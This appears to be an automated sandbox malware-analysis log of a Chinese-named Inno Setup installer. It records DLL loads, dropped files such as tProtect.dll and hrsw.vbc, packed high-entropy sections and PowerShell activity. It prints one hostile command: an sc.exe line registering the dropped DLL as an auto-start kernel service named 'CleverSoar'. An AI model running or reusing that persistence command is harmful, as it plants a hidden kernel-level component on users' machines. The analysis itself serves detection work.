Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: shfolder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: sfc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp

Window found: window name: TMainForm

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe

Static file information: File size 8206704 > 1048576

Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:

Source: C:\Program Files (x86)\Windows NT\7zr.exe

Code function: 10_2_007D57D0 GetCurrentProcessId,GetCurrentThreadId,LoadLibraryW,GetProcAddress,FreeLibrary,GetTickCount,QueryPerformanceCounter,GetTickCount,

10_2_007D57D0

Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp.5.dr	Static PE information: real checksum: 0x0 should be: 0x3438fd
Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe	Static PE information: real checksum: 0x0 should be: 0x7dfa3a
Source: update.vac.6.dr	Static PE information: real checksum: 0x0 should be: 0x378c79
Source: update.vac.2.dr	Static PE information: real checksum: 0x0 should be: 0x378c79
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp.0.dr	Static PE information: real checksum: 0x0 should be: 0x3438fd
Source: hrsw.vbc.6.dr	Static PE information: real checksum: 0x0 should be: 0x378c79
Source: tProtect.dll.12.dr	Static PE information: real checksum: 0x1eb0f should be: 0xfc66

Source: #U5b89#U88c5#U52a9#U624b2.0.6.exe	Static PE information: section name: .didata
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp.0.dr	Static PE information: section name: .didata
Source: update.vac.2.dr	Static PE information: section name: .00cfg
Source: update.vac.2.dr	Static PE information: section name: .voltbl
Source: update.vac.2.dr	Static PE information: section name: .#.q
Source: #U5b89#U88c5#U52a9#U624b2.0.6.tmp.5.dr	Static PE information: section name: .didata
Source: 7zr.exe.6.dr	Static PE information: section name: .sxdata
Source: hrsw.vbc.6.dr	Static PE information: section name: .00cfg
Source: hrsw.vbc.6.dr	Static PE information: section name: .voltbl
Source: hrsw.vbc.6.dr	Static PE information: section name: .#.q
Source: update.vac.6.dr	Static PE information: section name: .00cfg
Source: update.vac.6.dr	Static PE information: section name: .voltbl
Source: update.vac.6.dr	Static PE information: section name: .#.q

Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CDD8C5B push ecx; ret	6_2_6CDD8C6E
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CC80F00 push ss; retn 0001h	6_2_6CC80F0A
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CEA6F10 push eax; ret	6_2_6CEA6F2E
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Code function: 6_2_6CE0B9F4 push 004AC35Ch; ret	6_2_6CE0BA0E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007545F4 push 007FC35Ch; ret	10_2_0075460E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007EFB10 push eax; ret	10_2_007EFB2E
Source: C:\Program Files (x86)\Windows NT\7zr.exe	Code function: 10_2_007EFE90 push eax; ret	10_2_007EFEBE

Source: update.vac.2.dr	Static PE information: section name: .#.q entropy: 7.193027440134885
Source: hrsw.vbc.6.dr	Static PE information: section name: .#.q entropy: 7.193027440134885
Source: update.vac.6.dr	Static PE information: section name: .#.q entropy: 7.193027440134885

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	File created: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	File created: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Program Files (x86)\Windows NT\7zr.exe	File created: C:\Program Files (x86)\Windows NT\tProtect.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Program Files (x86)\Windows NT\7zr.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\update.vac	Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-0SINS.tmp\update.vac	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Program Files (x86)\Windows NT\hrsw.vbc	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OODAG.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	File created: C:\Users\user\AppData\Local\Temp\is-64MMK.tmp\update.vac	Jump to dropped file

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b2.0.6.exe	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-BOUK3.tmp\#U5b89#U88c5#U52a9#U624b2.0.6.tmp	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
